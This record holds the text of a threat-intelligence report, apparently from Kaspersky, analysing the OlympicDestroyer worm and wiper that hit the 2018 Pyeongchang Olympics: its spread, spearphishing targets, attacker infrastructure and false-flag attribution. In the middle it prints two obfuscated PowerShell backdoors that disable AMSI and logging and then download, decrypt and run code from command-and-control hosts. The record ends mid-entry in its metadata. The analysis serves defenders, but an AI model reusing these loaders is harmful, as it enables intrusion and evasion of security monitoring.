{ "id": "b2331d58-9cc4-41ec-a3aa-1d83083135ed", "created_at": "2026-04-06T00:16:38.019647Z", "updated_at": "2026-04-10T13:12:50.685911Z", "deleted_at": null, "sha1_hash": "4023c65b386018e28197a57a61b698196ec5aa17", "title": "OlympicDestroyer is here to trick the industry", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1096753, "plain_text": "OlympicDestroyer is here to trick the industry\r\nBy GReAT\r\nPublished: 2018-03-08 · Archived: 2026-04-05 13:18:13 UTC\r\nA couple of days after the opening ceremony of the Winter Olympics in Pyeongchang, South Korea, we received\r\ninformation from several partners, on the condition of non-disclosure (TLP:Red), about a devastating malware attack on the\r\nOlympic infrastructure. A quick peek inside the malware revealed a destructive self-modifying password-stealing self-propagating malicious program, which by any definition sounds pretty bad.\r\nAccording to media reports, the organizers of the Pyeongchang Olympics confirmed they were investigating a cyberattack\r\nthat temporarily paralyzed IT systems ahead of official opening ceremonies, shutting down display monitors, killing Wi-Fi,\r\nand taking down the Olympics website so that visitors were unable to print tickets. We also found other attempts to wreak\r\nhavoc at companies working closely with the Winter Olympics.\r\nMalware features\r\nSeveral files related to the cyberattack were uploaded to VirusTotal on the day of the attack and were quickly picked up by\r\nother security researchers. As we were researching this attack, the Cisco Talos team published a brief description of the\r\nmalware which Talos got from an undisclosed source. In their blog Talos highlighted some similarities between the attack,\r\nNetya (Expetr/NotPetya) and BadRabbit (targeted ransomware).\r\nThe Talos publication effectively removed the TLP constraint as the information had now become public and could be\r\nreferenced in this way. However, we decided not to jump to conclusions, especially with regards to attribution, and spent\r\ntime researching it calmly and methodologically, while we continued to discover more and more false flags and\r\ncontroversies in the malware.\r\nThe main malware module is a network worm that consists of multiple components, including a legitimate PsExec tool from\r\nSysInternals’ suite, a few credential stealer modules and a wiper. From a technical perspective, the purpose of the malware is\r\nto deliver and start the wiper payload which attempts to destroy files on the remote network shares over the next 60 minutes.\r\nMeanwhile, the main module collects user passwords from browser and Windows storage and crafts a new generation of the\r\nworm that contains old and freshly collected compromised credentials. The new generation of the worm is pushed to\r\naccessible local network computers and starts using the PsExec tool, leveraging the collected credentials and current user\r\nprivileges.\r\nOnce the wiper has run for 60 minutes it cleans Windows event logs, resets backups, deletes shadow copies from the file\r\nsystem, disables the recovery item in the Windows boot menu, disables all the services on the system and reboots the\r\ncomputer. Those files on the network shares that it managed to wipe within 60 minutes remain destroyed. The malware\r\ndoesn’t use any persistence and even contains protection (also a killswitch) against recurring reinfection. Incidentally, only\r\n1MB of the remote files are fully overwritten with zeroes; larger files were wiped with just 1K of zeroes in the header. The\r\nlocal files are not destroyed and the worm doesn’t wipe itself or its components.\r\nFig.1 OlympicDestroyer component relations\r\nReconnaissance stage\r\nSeveral companies have blogged about OlympicDestroyer’s attribution, it’s features and propagation method, but no one has\r\ndiscovered how exactly it was launched and from where. That’s where we had a little bit more luck.\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 1 of 11\n\nSince December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails\r\nrelated to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to\r\nmake it look like the text had an encoding problem, encouraging the user to press a button to “Enable Content”.\r\nFig.2 Screenshot of attachment from a spearphishing email.\r\nWhen the victim “enables content”, the document starts a cmd.exe with a command line to execute a PowerShell scriptlet\r\nthat, in turn, downloads and executes a second stage PowerShell scriptlet and, eventually, backdoors the system. The only\r\napparent links between this email campaign and OlympicDestroyer would have been the target, however, we managed to\r\ndiscover a couple of connections between this weaponized document and the attack in Pyeongchang which makes us believe\r\nthey are related.\r\nFor this investigation, our analysts were provided with administrative access to one of the affected servers located in a hotel\r\nbased in Pyeongchang county, South Korea. A triage analysis was conducted on this Windows server system. The affected\r\ncompany also kindly provided us with the network connections log from their network gateway. Thanks to this, we\r\nconfirmed the presence of malicious traffic to a malicious command and control server at IP 131.255.*.* which is located in\r\nArgentina. The infected host established multiple connections to this server on ports from the following list:\r\n443\r\n4443\r\n8080\r\n8081\r\n8443\r\n8880\r\nThe server in Argentina was purchased from a reseller company in Bulgaria, which kindly assisted us in this investigation.\r\nThe company shared that the server was purchased from Norway, by a person using a Protomail account:\r\nName: Simon ***\r\nEmail: simon***@protonmail.com\r\nLast Login Date: 2018-02-07 16:09\r\nIP Address: 82.102.*.* (Norway)\r\nServer purchased on: 2017-10-10\r\nWe were able to further connect this to a suspicious looking domain, with a registration address and phone number from\r\nSweden:\r\nDomain: microsoft******[.]com\r\nRegistration name: Elvis ****\r\nEmail: elvis***@mail.com\r\nRegistration date: 2017-11-28\r\nBefore getting suspended in December 2017 for failing the ICANN email verification check, the domain registration was\r\nprivacy-protected. This shielded the registration data, except the DNS servers, which indicate it was purchased via\r\nMonoVM, a VPS for a bitcoin provider:\r\nName Server: monovm.earth.orderbox-dns[.]com\r\nName Server: monovm.mars.orderbox-dns[.]com\r\nName Server: monovm.mercury.orderbox-dns[.]com\r\nName Server: monovm.venus.orderbox-dns[.]com\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 2 of 11\n\nName server history:\r\nFig.3 Name server history for microsoft*****.com\r\nThis email popped up as a contact detail for a small network inside the 89.219.*.* range that is located in Kazakhstan. This\r\nis where the trail ends for now. We apologize for not disclosing the full information as we would like to avoid random\r\ninteractions with this contact. Full information has been provided to law enforcement agencies and customers subscribed to\r\nour APT Intel reporting service.\r\nTo manage the server in Argentina, Simon *** used the IP address in Norway (82.102.*.*). This is the gateway of a VPN\r\nservice known as NordVPN (https://nordvpn.com/) that offers privacy-protected VPN services for bitcoins.\r\nIt’s not the first time the name NordVPN has cropped up in this case. We previously saw a weaponized Word document used\r\nin spearphishing emails targeting the Winter Olympics that contained something that looked like garbage text taken from a\r\nbinary object (e.g. pagefile or even raw disk). However, part of the random data included two clearly readable text strings\r\n(highlighted below) that made it into the document (md5: 5ba7ec869c7157efc1e52f5157705867) for no obvious reason:\r\nFig. 4 A reference to NordVPN openvpn config file\r\nOf course, this is a low confidence indicator, but seems to be another link between the spearphishing campaign on the\r\nWinter Olympics and the attackers responsible for launching the OlympicDestroyer worm. In addition, this document\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 3 of 11\n\nincludes a PowerShell command that closely resembles the PowerShell backdoor found in the network of the\r\nOlympicDestroyer victim. A comparison of this code is available below.\r\nThe PowerShell scripts listed below were used in the weaponized documents and as standalone backdoors. As standalone\r\nfileless backdoors, they were built and obfuscated using the same tool. Both scripts use a similar URL structure and both\r\nimplement RC4 in PowerShell, as well as using a secret key passed to the server in base64 via cookies.\r\nSpearphishing case in South Korea Powershell found on OlympicDestroyer victim\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n(  gCi VariABLE:FzS3AV  ).\"VaLUE\"::\"expecT100cOnTiNUe\"=0;\r\n${wC}=^\u0026NEW-ObjecT System.Net.Webclient;${u}=Mozilla/5.0 (Windows NT\r\n6.1;WOW64; Trident/7.0; rv:11.0)like Gecko;\r\n(  GCI VARiabLe:fZS3aV ).\"vAlUe\"::\"seRVeRCeRTiFICaTEVALIDATIoNCALlbAck\"\r\n= {${tRUE}};\r\n${wC}.\"hEADERs\".Add.Invoke(User-Agent,${U});\r\n${WC}.\"PROXy\"=  ( variaBLe  (\"fX32R\") -VAlUeO )::\"DefaultWebProxy\";\r\n${wc}.\"pRoxY\".\"CREdENtials\" =  ( GET-vaRiABle\r\n('hE7KU')).\"VAlue\"::\"dEFauLTNeTWOrkCREdENTIALs\";\r\n${K}=  $XNLO::\"asCiI\".GetBytes.Invoke(5e2988cfc41d844e2114dceb8851d0bb);\r\n${R}=\r\n{\r\n  ${D},${K}=${ArGs};\r\n  ${s}=0..255;0..255^|^\u0026('%')\r\n  {\r\n    ${j}=(${j}+${s}[${_}]+${k}[${_}%${K}.\"couNt\"])%256;\r\n    ${s}[${_}],${S}[${J}]=${s}[${J}],${S}[${_}]\r\n  };\r\n  ${d}^|^\u0026('%')\r\n  {\r\n    ${I}=(${I}+1)%256;\r\n    ${h}=(${H}+${s}[${I}])%256;\r\n    ${S}[${I}],${s}[${H}]=${s}[${H}],${S}[${I}];\r\n    ${_}-BxoR${S}[(${s}[${I}]+${S}[${H}])%256]}\r\n};\r\n${Wc}.\"hEadeRS\".Add.Invoke(cookie,session=ABWjqj0NiqToVn0TW2FTlHIAApw=);\r\n${SER}=https://minibo***[.]cl:443;\r\n${T}=/components/com_tags/controllers/default_tags.php;\r\n${dATa}=${Wc}.DownloadData.Invoke(${seR}+${T});\r\n${IV}=${DATA}[0..3];\r\n${dAta}=${DaTA}[4..${dAtA}.length];\r\n-jOin[ChaR[]](^\u0026 ${R} ${DAtA} (${IV}+${K}))^|.IEX  \u0026\u0026SeT   RMN=ecHo\r\nInvoKe-expRESsIon  ([ENVirOnMeNt]::gETeNvIroNMENTvarIaBlE('svTI','procEsS'))  ^|\r\npOWErshEll -NOnint  -wiNdOWSt hiddeN -NoEXiT  -NoprOFilE -\r\nExECuTiONPOLIcy  bYpASs     -  \u0026\u0026 CMd.exE   /c%Rmn%\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\nIf($PSVERsIoNTAbLe.PSVeRsIon.MA\r\n[ReF].ASSEmbly.GETTYPE('System.M\r\n('cachedGroupPolicySettings','N'+'onPub\r\nIf($GPS['ScriptB'+'lockLogging']){$GP\r\n['EnableScriptB'+'lockLogging']=0;\r\n$GPS['ScriptB'+'lockLogging']\r\n['EnableScriptBlockInvocationLogging']\r\n('signatures','N'+'onPublic,Static').SETV\r\nCoLLectIOnS.GeNeRIC.HAshSet[stRin\r\n[ReF].AssEmbLY.GETTYPe('System.M\r\n{$_}|%\r\n{$_.GEtField('amsiInitFailed','NonPubli\r\n};\r\n[SYStem.NeT.SerVicePoinTMANAGeR\r\n$wC=NeW-ObJect SySTem.NEt.WEBC\r\n$u='Mozilla/5.0 (Windows NT 6.1; WOW\r\n$Wc.HEADErS.Add('User-Agent',$u);\r\n$wC.ProXY=[SYsTeM.NET.WeBREqU\r\n$wC.PROxY.CredentIAlS =\r\n[SYsTem.NEt.CRedeNTialCacHe]::DeF\r\n$Script:Proxy = $wc.Proxy;\r\n$K=[SysTEM.Text.ENcOding]::ASCII.G\r\no@qRl\u003e.:FPev7rtNb^|#im');\r\n$R=\r\n{\r\n$D,$K=$ARgs;\r\n$S=0..255;0..255|%{$J=($J+$S[$_]+$K\r\n$S[$_],$S[$J]=$S[$J],$S[$_]};\r\n$D|%\r\n  {\r\n   $I=($I+1)%256;\r\n   $H=($H+$S[$I])%256;\r\n   $S[$I],$S[$H]=$S[$H],$S[$I];\r\n   $_-bxor$S[($S[$I]+$S[$H])%256]\r\n  }\r\n};\r\n$ser='http://131.255.*.*:8081';\r\n$t='/admin/get.php';\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 4 of 11\n\n$wc.HeAders.Add(\"Cookie\",\"session=z\r\n$daTA=$WC.DownlOADDATA($ser+$\r\n$iV=$DATa[0..3];\r\n$datA=$dATa[4..$data.leNgth];\r\n-joiN[CHAR[]](\u0026 $R $dAta ($IV+$K))\r\nLateral movement\r\nDespite the network worm’s self-replicating feature, the attackers did some manual lateral movement before starting on the\r\ndestructive malware. We believe this was done to look for a better spot to release the worm. They seemed to be moving\r\nthrough the network via Psexec and stolen credentials, opening a default meterpreter port (TCP 4444) and downloading and\r\nrunning a backdoor (meterpreter). The attackers also checked the network configuration, potentially searching for servers\r\nattached to multiple networks or VPN links in order to penetrate adjacent networks that could be linked to the Olympic\r\nCommittee infrastructure.\r\nOne of the hosts in the network of the affected ski resort hotel had Kaspersky Lab’s system watcher component enabled,\r\nwhich collected quite a few of the artifacts used by the attackers for lateral movement. According to the telemetry from this\r\nhost, the attackers entered the system on 6 February, 2018. They used three types of PowerShell scriptlets: TCP 4444 port\r\nopener, ipconfig launcher and a downloader.\r\nBased on telemetry we received from one of the hosts, we built a timeline of the attackers’ activity and a histogram showing\r\nwhen the attackers started executables on the system.\r\nFig.5 Histogram with attacker activity per hour of day\r\nFrom this we can see that the attackers were mostly busy outside of office hours according to Korean Standard Time\r\n(UTC+9), perhaps to attract less attention or simply due to their own timezone.\r\nWorm propagation\r\nOlympicDestroyer is a network worm that collects user credentials with hostnames. New data is appended to the end of an\r\nexisting collection. Having multiple samples of the worm from different networks allows us to reconstruct the path of the\r\nworm and find the source of distribution (or at least its hostname and list of users).\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 5 of 11\n\nFig.6 OlympicDestroyer worm propagation\r\nThe diagram above was built based on extracted lists of credentials with hostnames and some alleged roles of the servers\r\nbased on respective names. We can see there were at least three independent launch pads for the worm: Atos.net company,\r\nski resort hotels, and the Pyeongchang2018.com server.\r\nAt some point, samples with a list of credentials were uploaded to VirusTotal where they were found by security researchers\r\nthat executed the worm in a sandbox environment and uploaded the new generation on VirusTotal again. There are a number\r\nof samples on VT that contain credentials from those sandbox machines. Nevertheless, it’s clear the network worm wasn’t\r\nstarted there initially, but was instead coming from one of the known launch pads.\r\nVictims\r\nSpearphishing emails were used to target the networks of official partners of the Winter Olympics. The attackers probably\r\nwent to the official website to find out the names of the partner companies, figured out their domain names, collected known\r\nemail addresses and started bombarding them with spearphishes.\r\nOne of these weaponized documents was uploaded to VT from South Korea on 29 December, 2017 inside an email file\r\n(6b728d2966194968d12c56f8e3691855). The sender address imitates the South Korean NCTC (National Counter-Terrorism\r\nCenter), while the sender’s server IP originates from a server in Singapore.\r\nFig.7 Fake sender address.\r\nThe email appears to have been sent to icehockey@pyeongchang2018[.]com. However, the real targets are in the following\r\nlist:\r\nIndustry Target Company/Organization Domain\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 6 of 11\n\nGovernment organization\r\nairport.co.kr\r\ncustoms.go.kr\r\nkepco.co.kr\r\nkma.go.kr\r\nkorail.com\r\nkorea.kr\r\npyeongchang2018.com\r\nsports.or.kr\r\nEnterprise\r\nsk.com\r\nkt.com\r\nEnergy\r\nesco-posco.co.kr\r\nposco.co.kr\r\nSemiconductor\r\nskhynix.com\r\nus.skhynix.com\r\nTransport\r\nkoreanair.com\r\nhanjin.co.kr\r\nHospital gnah.co.kr\r\nMedia donga.com\r\nAdvertising\r\nppcom.kr\r\nsamikdisplay.co.kr (LED display company)\r\ntkad.co.kr\r\nvestceo@naver.com (LED Panel Advertising company email)\r\nResort/Hotel\r\nalpensiaresort.co.kr\r\nyongpyong.co.kr\r\nThe attackers appear to have got sloppy when they searched for email addresses that ended with those targeted domains.\r\nUsing short domain names such as sk.com or kt.com wasn’t a good idea. This went unnoticed and a few totally unrelated\r\ncompanies with domain names ending with sk.com and kt.com received spearphishing emails:\r\nkrovy-sk.com (Wood company in Slovakia)\r\nokc-sk.com (Mining-related company in Canada)\r\nbcel-kt.com (Finance company in Laos)\r\nkuhlekt.com (Software company in Australia)\r\nwertprojekt.com (Real estate company in Germany)\r\nBased on all the evidence we discovered, the following networks seem to have been breached in the attack:\r\nSoftware vendor responsible for automation at ski resorts\r\nTwo ski resort hotels in South Korea\r\nIT service provider (Atos.net) headquartered in France\r\ncom attached network\r\nConsidering the malware was spread as a network worm via Windows network shares, collateral damage was inevitable.\r\nThrough one of the victims who uploaded the dropper file to VT from Austria, we were able to extract the hostname from\r\nthe stolen credentials stored in the malware: ATVIES2BQA. While it may look like a random sequence of characters at first\r\nglance, we speculate that AT stands for the host country code (Austria) which matches the submitter source country,\r\nfollowed by the organization name “VIES” with some extra random characters uniquely identifying the host. According to\r\nOSINT, there is only one large organization that matches this name in Austria – the VAT Information Exchange System\r\nused throughout the European Union. VIES is a search engine owned by the European Commission. So, it’s either a\r\ncompromised host of Atos which role is to communicate with the Austrian VIES or the Austrian VIES indeed is indeed in\r\ncollateral damage of the malware’s network propagation.\r\nBut the main outbreak of the worm that we investigated was at a hotel in a South Korean winter resort. The hotel didn´t\r\nupload any samples to VT, which is why it remained unknown. We assume many other companies attacked in South Korea\r\ndid the same, which reduced the visible surface of the attacked infrastructure.\r\nWhile we cannot name the hotel chain, we can say that one of its hotels located in a ski resort in Pyeongchang was subjected\r\nto an attack. Despite the close proximity to the Olympic Games, the resort was not one of the official winter parks staging\r\nthe games. However, it is definitely part of the surrounding infrastructure that hosted numerous guests and possibly even\r\nsports teams competing at the Olympics. In an interview with the owners, we found out that the malware disabled ski gates\r\nand ski lifts that were operated from one of the attacked servers. Our analysis showed that this was not collateral damage.\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 7 of 11\n\nThe attackers deliberately chose to start the spread of the destructive worm from this dedicated ski resort automation server.\r\nThat server was the so-called patient-zero in the network. The timing was also chosen to precede the official opening\r\nceremony by a couple of hours, allowing the worm to propagate deep enough into networks to cause maximum\r\ninconvenience for those using the affected infrastructure. As a matter of fact, the plan was to let the worm gain better\r\nvisibility in the news.\r\nAttribution hell\r\nIn their blog the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and\r\nNotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the\r\ntechniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code and because the\r\ncommand lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to\r\nuse them.\r\nFig.8 Event logs cleaning and disabling system recovery in OlympicDestroyer and NotPetya\r\nSoon after the Talos publication, Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups.\r\nFig.9 Announcement of connection to Chinese APTs by IntezerLabs on 12 Feb, 2018\r\nIntezerLabs released a blogpost with an analysis of features found using their in-house malware similarity technology.\r\nA few days later media outlets started publishing articles suggesting potential motives and activities by Russian APT groups:\r\n“Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation\r\noperating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy\r\nBear”…”.\r\nOn the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media said: “There is no\r\nevidence connecting Fancy Bear to the Olympic attack”.\r\nHowever, a couple of weeks later, the Russian trace was brought up again by the Washington Post, which claimed that\r\nRussian military spies were behind the Winter Olympics attack, citing “two U.S. officials who spoke on the condition of\r\nanonymity”. Unfortunately, such articles based on anonymous sources contain no verifiable information and bring no real\r\nanswers – they only spread rumors.\r\nMicrosoft’s security team also seems to have been tricked by the malware as their internal detection was triggered on the\r\npotential use of EternalRomance exploit (MS17-010).\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 8 of 11\n\nFig.10 Microsoft security team claims they found EternalRomance in OlympicDestroyer\r\nA couple of days later Microsoft had to retract those claims as they were simply not confirmed.\r\nFig.11 Microsoft security team retracts previous claims in a subsequent tweet\r\nThe day after we released a private report with forensic findings and detailed analysis of this attribution hell to our APT Intel\r\nsubscribers (for more information please contact: intelreports@kaspersky.com), the Cisco Talos team decided to revisit\r\nOlympicDestroyer and go public with a similar review. We сan’t help but agree with this nice write-up with code\r\ncomparison, because we came to very similar conclusions.\r\nIn addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its\r\noperation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the\r\nBangladesh SWIFT cyberheist in 2016.\r\nRecorded Future decided to not attribute this attack to any actor; however, they claimed that they found similarities to\r\nBlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.\r\nWe can’t dispute that part of the code really does resemble the Lazarus code. The wiper modules used in OlympicDestroyer\r\n(MD5: 3c0d740347b0362331c882c2dee96dbf) and Bluenoroff (MD5: 5d0ffbc8389f27b0649696f0ef5b3cfe) used similar\r\ncode to wipe files.\r\nFig.12 Comparison of wiping module (left: Bluenoroff tool; right: OlympicDestroyer)\r\nThere is also a high level of similarity between Lazarus and OlympicDestroyer. There are modules in both campaigns that\r\nused the same technique to decrypt a payload in memory using a secret password provided via a command line. Lazarus\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 9 of 11\n\nused this in their malware loaders (Recorded Future also mentions a similarity in malware loader code) to protect their\r\nbackdoor modules from reverse engineering as they contained some default C2 information.\r\nDespite the resemblance in the method, there are significant differences in its usage:\r\n1. 1 Lazarus used long and reliable alphanumeric passwords (30+ characters long). OlympicDestroyer on the contrary\r\nused a very simple password: “123”.\r\n2. 2 Lazarus never hardcoded its passwords for protected payloads into the malware body. OlympicDestroyer on the\r\ncontrary hardcoded it (there was actually no other way, because the worm had to spread itself and run fully\r\nautonomously). That’s why the whole idea of using password-protected payloads in the network worm looks\r\nridiculous, and we believe it’s unlikely an actor such as Lazarus would implement techniques like that considering\r\ntheir previous TTPs.\r\nThe possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the\r\nopening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the\r\nofficial opening ceremony on 9 February, 2018.\r\nWhat we discovered next brought a big shock. Using our own in-house malware similarity system we have discovered a\r\nunique pattern that linked Olympic Destroyer to Lazarus. A combination of certain code development environment features\r\nstored in executable files, known as Rich header, may be used as a fingerprint identifying the malware authors and their\r\nprojects in some cases. In case of Olympic Destroyer wiper sample analyzed by Kaspersky Lab this “fingerprint” gave a\r\n100% match with previously known Lazarus malware components and zero overlap with any other clean or malicious file\r\nknown to date to Kaspersky Lab.\r\nYet the motives and other inconsistencies with Lazarus TTPs made some of our researchers skeptically revisit that rare\r\nartefact. With another careful look into these evidence and manual verification of each feature we discovered that the set of\r\nfeatures doesn’t match the actual code. At that moment it became clear that the set of features was simply forged to perfectly\r\nmatch the fingerprint used by Lazarus. Considering that this is not very well explored area in malware analysis and\r\nattribution, we decided to share some more information on how we proved in a dedicate blogpost with some deep technical\r\ndetails.\r\nWe also noticed that there exists a wiper module with original Rich header and it was uploaded to VirusTotal from France\r\nwhere one of the victims (Atos) is located. The compilation timestamp was 2018-02-09 10:42:19 which is almost 2 hours\r\nafter attack in Pyeongchang ski resorts started. It’s unclear what went wrong but it looks like the attackers rushed to modify\r\nthe worm’s wiper component, so that it immediately disabled system services and rebooted the machine instead of waiting\r\nfor 60 minutes. They seem to wanted immediate results as there were just minutes before the official opening ceremony\r\nstarted.\r\nConsidering all of the above it it now looks like a very sophisticated false flag which was placed inside the malware\r\nintentionally in order to give threat hunter impression that they found a smoking gun evidence, knocking them of the trail to\r\nthe accurate attribution.\r\nConclusions\r\nWhat conclusions can we draw from this?\r\nIt really depends on how clever the attacker behind this campaign is.\r\nIf Lazarus was the smartest of all, then they could have crafted a sophisticated false flag that would be hard to discover,\r\nrequiring even more sophistication to prove it’s a forgery. However, the level of researcher sophistication is something that’s\r\ndifficult for attackers to gauge. The level of complexity we’re talking about would definitely reduce reliability and couldn’t\r\nguarantee that everything went to plan. In addition, Lazarus had no rational motive to conduct this attack, not to mention\r\nTTPs that obviously weren’t theirs.\r\nSpeaking of TTPs, we have seen attackers using NordVPN and MonoVM hosting. Both services are available for bitcoins,\r\nwhich make them the perfect tool for APT actors. This and several other TTPs have in the past been used by the Sofacy APT\r\ngroup, a widely known Russian-language threat actor. A year ago we published our research about the Lazarus APT group\r\nusing false flags in attacks against banks around the world that pointed to a Russian origin. Was it payback from Russian-speaking Sofacy or was it someone else trying to frame Sofacy? The muddied waters of this case mean we are yet to get a\r\nclear answer.\r\nThere are some open questions about the attacker’s motivation in this story. We know that the attackers had administrative\r\naccounts in the affected networks. By deleting backups and destroying all local data they could have easily devastated the\r\nOlympic infrastructure. Instead, they decided to do some “light” destruction: wiping files on Windows shares, resetting\r\nevent logs, deleting backups, disabling Windows services and rebooting systems into an unbootable state. When you add in\r\nthe multiple similarities to TTPs used by other actors and malware, intentional false flags and relatively good opsec, it\r\nmerely raises more questions as to the purpose of all this.\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 10 of 11\n\nAs we see it, these are some of the possible motives behind the attack:\r\n1. 1 Demonstration of power/skills in the context of a secret communication that we’re unaware of. The potential for\r\nfull-blown, highly destructive cybersabotage might be a strong argument in top-secret political negotiations.\r\n2. 2 Testing of destructive worm capability, but with lower impact to avoid too much attention from potential\r\ninvestigators and general public (in case of human error or operational failure).\r\n3. 3 Trap threat intel researchers in a field of false flags and, based on their responses, learn how to implement the\r\nperfect false flag.\r\nThe last option makes sense when you consider that the malware contained a wiper that wasn’t used to wipe its own\r\ncomponents – the authors wanted it to be discovered.\r\nFor a powerful attacker learning how to reliably craft false flags and trick researchers into attributing the attack to someone\r\nelse can mean gaining the ultimate cover – total immunity against attribution. But this kind of rocket science requires real-life experiments.\r\nWe think the carefully orchestrated OlympicDestroyer campaign played a very important role that will shape APT research\r\nin the future. While it didn’t fully sabotage the Winter Olympic games in Pyeongchang, its effects were noticed not only in\r\nSouth Korea but also in Europe. Most importantly, it brings with it a potential threat to the attribution process, undermining\r\ntrust in intel research findings.\r\nThere’s a lesson to be taken from this attack that’s useful for all of us in threat intelligence – don’t rush with attribution. This\r\nis a very delicate subject that should be handled with great care. We as an industry shouldn’t sacrifice the accuracy of our\r\nresearch to opportunistically promote business.\r\nKnown OlympicDestroyer executables\r\n0311CEC923C57A435E735E106517797F\r\n104ECBC2746702FA6ECD4562A867E7FB\r\n12668F8D072E89CF04B9CBCD5A3492E1\r\n19C539FF2C50A0EFD52BB5B93D03665A\r\n221C6DB5B60049E3F1CDBB6212BE7F41\r\n3514205D697005884B3564197A6E4A34\r\n3C0D740347B0362331C882C2DEE96DBF\r\n47E67D1C9382D62370A0D71FECC5368B\r\n4C8FA3731EFD2C5097E903D50079A44D\r\n4F43F03783F9789F804DCF9B9474FA6D\r\n51545ABCF4F196095ED102B0D08DEA7E\r\n52775F24E230C96EA5697BCA79C72C8E\r\n567D379B87A54750914D2F0F6C3B6571\r\n5778D8FF5156DE1F63361BD530E0404D\r\n583F05B4F1724ED2EBFD06DD29064214\r\n58DD6099F8DF7E5509CEE3CB279D74D5\r\n59C3F3F99F44029DE81293B1E7C37ED2\r\n64AA21201BFD88D521FE90D44C7B5DBA\r\n65C024D60AF18FFAB051F97CCDDFAB7F\r\n68970B2CD5430C812BEF5B87C1ADD6EA\r\n6E0EBEEEA1CB00192B074B288A4F9CFE\r\n7C3BF9AB05DD803AC218FC7084C75E96\r\n83D8D40F435521C097D3F6F4D2358C67\r\n86D1A184850859A6A4D1C35982F3C40E\r\nSource: https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nhttps://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "report_names": [ "84295" ], "threat_actors": [ { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": 